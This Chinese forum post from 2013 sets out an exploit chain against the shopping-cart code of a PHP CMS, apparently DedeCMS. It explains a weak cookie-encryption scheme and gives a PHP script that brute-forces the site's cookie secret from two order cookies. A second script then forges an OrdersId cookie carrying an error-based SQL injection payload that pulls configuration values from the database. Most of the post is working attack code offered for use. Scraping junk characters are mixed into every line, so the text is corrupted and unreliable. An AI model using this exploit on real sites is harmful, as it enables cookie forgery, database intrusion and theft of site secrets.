www.xxx.com/plus/search.php?keyword=3 e* f4 ]/ a; t! S+ K7 S
在 include/shopcar.class.php中
# [7 d" t4 P/ l3 F$ X$ \先看一下这个shopcar类是如何生成cookie的
- Q& I. S$ J$ L$ F) D e1 C) M5 f239 function saveCookie($key,$value); i! x# ]! B% D5 t* \, x; X
240 {& W2 o. c7 u0 m8 Y4 s
241 if(is_array($value))4 H" k7 h7 J3 n" }
242 {+ H6 N* x. F. z n5 ?, K
243 $value = $this->enCrypt($this->enCode($value));
7 ^6 t0 A+ H- \/ ?, b244 }! @1 Y8 j- T' c+ I& Z
245 else
d* D7 n% c! p- O4 C8 C# \( x8 F246 {
* ^( d) t# ?' [+ D0 a9 g8 p247 $value = $this->enCrypt($value);
+ D T- G+ B+ Z$ K) D& H+ Y248 }: D" H6 m5 }+ m. h) M% e2 m W
249 setcookie($key,$value,time()+36000,’/');) d2 R9 G* j& j& |! s& q# o
250 }1 q6 ^( j! y3 Y2 Y# T/ O5 ?! L
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数2 X- s; |, e. B) c: P) K$ E
186 function enCrypt($txt)
. ^/ \* ^6 w5 z h' a. E187 {* |" A! J6 a3 [5 U! _
188 srand((double)microtime() * 1000000);
5 M. d$ |: R! D9 S189 $encrypt_key = md5(rand(0, 32000));+ o) o+ n) a& D/ g. s. k: u
190 $ctr = 0;! e1 e/ }; e& j- X
191 $tmp = ”;( \! [1 m- H3 ?& Z9 X0 R
192 for($i = 0; $i < strlen($txt); $i++)
' ?! o! n: ]* P7 U193 {$ X* W! j& w, c2 e9 D
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# V* X, k$ j; d$ q" i5 m$ N! J195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);. W$ [+ ] \4 X7 ^! ]" ]5 s; p
196 }7 j/ S7 ~0 T5 Q. \7 l9 [. G( t
197 return base64_encode($this->setKey($tmp));1 D( W( ]9 s( ^$ @
198 }
) v8 S0 a2 x6 q; h213 function setKey($txt) @2 N/ t2 ~& S5 {9 a$ l/ d
214 {
8 p6 w0 J7 ~0 p! b215 global $cfg_cookie_encode;0 V1 N; S( V$ R
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));* u3 o5 Q7 V A# R4 P& D
217 $ctr = 0;. g7 K: \( D* l+ |
218 $tmp = ”;
1 w, h' F0 {+ [3 m219 for($i = 0; $i < strlen($txt); $i++)
6 M# [/ G8 o% g$ P& N3 {# }5 R220 {5 Z+ n, t: V S7 |
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
; y+ D$ U, r& ?! `. Q( L* z4 o222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];1 c" D: u5 o) M1 | X' r$ q
223 } J8 r0 S3 `, P- t7 C1 T
224 return $tmp;2 ~7 r& o. l; f6 h2 h2 ~0 }
225 }2 Y+ H8 Z% Z( ^' K0 o; \
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的2 m( F8 K0 t. C9 K! @ z( m6 U
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
& }9 h z4 _: h- G具体代码如下:% o; K3 T7 Q- I% s# s) }7 d" u
<?php( y$ O+ S( ^, u0 v
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
6 f2 r1 N3 r6 m% n* w/ I$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
/ n% e$ D+ D) i" }7 I6 Q, M$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 Y: |7 }7 L; z( q3 ^! Kfunction reStrCode($code,$string)
. ?% }! T7 Q# e* @{
3 P6 Y {( C% D/ A$ ? E$code = base64_decode($code);
5 p' ]7 E% r, v8 x1 F G, V4 _% h$key = “”;, y8 T. F* t' F0 c4 Y& R
for($i=0 ; $i<32 ; $i++)
! s, l% k, V5 k% w9 g, y9 V. _% a{
7 M; N5 H3 [! l8 X$key .= $string[$i] ^ $code[$i];
* Y* k1 @5 }& [ f}
" I3 o" x0 B: Q4 T3 dreturn $key;; M8 H$ _# n G3 t! m1 X/ }
}
* a! ?5 o" M4 F! M+ n n2 K: Q Xfunction getKeys($cookie,$plantxt)
" P4 S( ?! H& x" d' P& j{
% c4 V/ G w, w( {$tmp = $cookie;
+ z8 A$ Z' N6 ^) N' H6 \5 F" T$results = array();$ C! N7 g1 M$ G j {$ w" i
for($j=0 ; $j < 32000; $j++)
* O! I* X6 ?) T+ v1 y5 z+ }# f6 a6 G{
5 p) _$ N$ H W- x( f7 ] I( v( g) y) i* t6 X6 F
$txt = $plantxt;
x+ ^8 t" n/ a6 m) Q7 X$ctr = 0;# f& p% x3 i7 U* T; T
$tmp = ”;* U* e; D A2 o5 t( b
$encrypt_key = md5($j);
" q9 Q. u+ X6 t8 cfor($i =0; $i < strlen($txt); $i ++)' a ?5 }8 N) Q8 z; W
{7 f( V1 _$ K% y" d! l
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ ^1 i" t# j' k7 Z; C) q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);7 q! D3 e9 b' W. T
}
: J k- g6 \ C$ Z0 b' b$string = $tmp;
; @; V2 _; F- t$code = $cookie;- _( ^# i; @, j4 `: @
$result = reStrCode($code,$string);" r+ u6 n1 x: S
if(eregi(‘^[a-z0-9]+$’,$result))) j4 ~+ m; \% U5 k- ]' D! h
{
. k2 X+ F: _; I' R2 Q6 recho $result.”\n”;* y+ i, s- s$ t& A4 C
$results[] = $result;) k+ q& d+ B8 h
}
2 n/ T9 e7 W* `5 T5 R}
4 Y# `! u# D, s3 M2 ?" [* preturn $results;
4 C% n- i7 S" f; s7 L/ w}
/ q t" I7 U2 M) I: f1 W$results1 = getKeys($cookie1,$plantxt);7 I2 ^4 r- T6 N( W3 E; X. \1 K
$results2 = getKeys($cookie2,$plantxt);
* u) N2 s; M. D* p2 z+ ^9 sprint “\n——————–real key————————–\n”;
. y, R- r, O5 K# B5 `" w& }foreach($results1 as $test1); i+ n$ v! r- U1 X$ @# n
{
& X6 R. V1 m0 j9 w+ |foreach($results2 as $test2)
! z1 T5 _4 y+ R U{" M! v2 m. h, y# |0 S
if($test1 == $test2)- v2 P- h# u; a' g1 t4 Z
{
) L5 B8 j; Z8 d- v2 i9 @( [echo $test1.”\n”;
+ ~/ B3 T! x0 Q: T}
9 e% @6 C! ~/ D5 V" \}( h5 a1 M& j) R7 I A
}/ |) C5 u- z: A/ i
?>' N! j' q# A, m: Z
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,9 r. D- n' ]0 G. A4 ^2 G% M; s
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
F2 \& i1 \4 a1 T. M然后推算出md5(strtolower($cfg_cookie_encode))/ p+ x2 u" A. K6 e7 C" ?
得到这个key之后,我们就可以构造任意购物车的cookie
# ^4 f! Z+ a3 a6 V3 }接着看9 _5 w% }' A( n
20 class MemberShops$ |" C# h, V' m6 o
21 {2 O" `$ v2 k+ i. M7 E8 \9 `
22 var $OrdersId;7 h8 p) B- @% t6 U% n3 n' y6 K6 ~
23 var $productsId;
0 ]* Y5 o7 ]3 Y h" a2 u24% i* _# G/ ~5 y2 M, G( m
25 function __construct()7 w2 Y$ z+ l" ?
26 {& {) m& V& A" O3 o0 b. h! ?+ s
27 $this->OrdersId = $this->getCookie(“OrdersId”);2 v0 f% \, z0 F+ q; A
28 if(empty($this->OrdersId))% |" S3 L+ x- t- k) A. \
29 {
' u- U: [& S# d' j% u0 ^/ i30 $this->OrdersId = $this->MakeOrders();" p! Y# S0 M+ C9 k9 U
31 }
4 a9 y! e$ v" Z$ v5 c# N! M8 ]32 }
H3 A; d0 F3 H K发现OrderId是从cookie里面获取的) w1 w, N$ k: f3 \9 }
然后7 ~: S" j2 [1 F
/plus/carbuyaction.php中的1 O5 F2 f: q1 G3 e ?
29 $cart = new MemberShops();% R% E7 O( x' r: E6 j, x7 C6 `
39 $OrdersId = $cart->OrdersId; //本次记录的订单号& k+ V) d1 n7 @5 F* D |
……
; R5 W+ F+ @5 i) ^0 p4 u4 f$ X173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
0 M# k$ u$ Z+ S5 Z R接着我们就可以注入了
0 ?5 P' o- S( U1 R2 n7 m$ v6 ~通过利用下面代码生成cookie:# m- ^; `, |& }
<?php
+ }8 z+ P" k& J$ R9 a8 j9 ]+ P) u$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
% V: l/ ]" a7 W: x0 v1 R$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
7 r5 b* ~! _" `# P. @function setKey($txt), t/ V' k( `- c8 R
{* X9 z0 c+ c0 \! o4 k. E0 F& a
global $encrypt_key;
- `( O" l1 j$ i4 @+ Z, \/ V$ctr = 0;
7 K; O: i# q3 k6 m$tmp = ”;4 j. l1 M! g* ^5 F
for($i = 0; $i < strlen($txt); $i++)
2 i& b. A, s$ ~+ g9 w4 m! X) @3 A{
8 V) \# T H4 b$ z# }$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) @; q r+ s8 E) j- F* @
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
( |5 g; \- p& h7 Z2 }}8 ~9 x" i% e2 _
return $tmp;
. `' i9 p& M1 y' S( m3 M}
8 N' G: N, T' k0 Y! W' U) ^function enCrypt($txt)* X \* v- Y" b$ S
{
6 f1 r x) H) ^' D9 Rsrand((double)microtime() * 1000000);! h1 E. V1 w: t2 b F- }0 W
$encrypt_key = md5(rand(0, 32000));% G% t& ]% L% v) Q& F
$ctr = 0;
1 d/ l+ u8 X2 p$ O; o/ T/ E$tmp = ”;
" f1 q8 v" p1 g: n/ l* Qfor($i = 0; $i < strlen($txt); $i++)2 F- U* J2 U6 L( s$ s0 B4 O! x8 a
{7 c* y# b. _* K) ~/ K9 `- e* j% D
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# c7 k/ ~: k: ~: l1 {
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
8 _& X- h2 L3 p}
9 A9 r0 k/ |4 s0 l* p1 greturn base64_encode(setKey($tmp));
3 P" o: F: ~; L( i" i}+ u8 W# J0 B) q" F: `
for($dest =0;$dest = enCrypt($txt);)( C4 i6 m" u. `3 X* i7 b
{
, {* R7 s' T {9 D4 Q1 n* `if(!strpos($dest,’+'))
" ?9 |$ `2 L3 G. _& Q6 |7 r+ D{4 @5 S3 x$ Z0 w6 v! G! C
break;9 i: a, i0 i: w& H2 i2 O/ _6 x
}
; L, L7 z8 g" z9 p8 o8 @}3 V6 j" W4 [1 q+ q
echo $dest.”\n”;$ s* O, k6 y( H' B
?>
3 j5 x t, |% N! H0 f2 E
! |& D9 x6 z5 @' k8 u0 y |
发表于 2013-2-13 23:58:29
收藏
支持
反对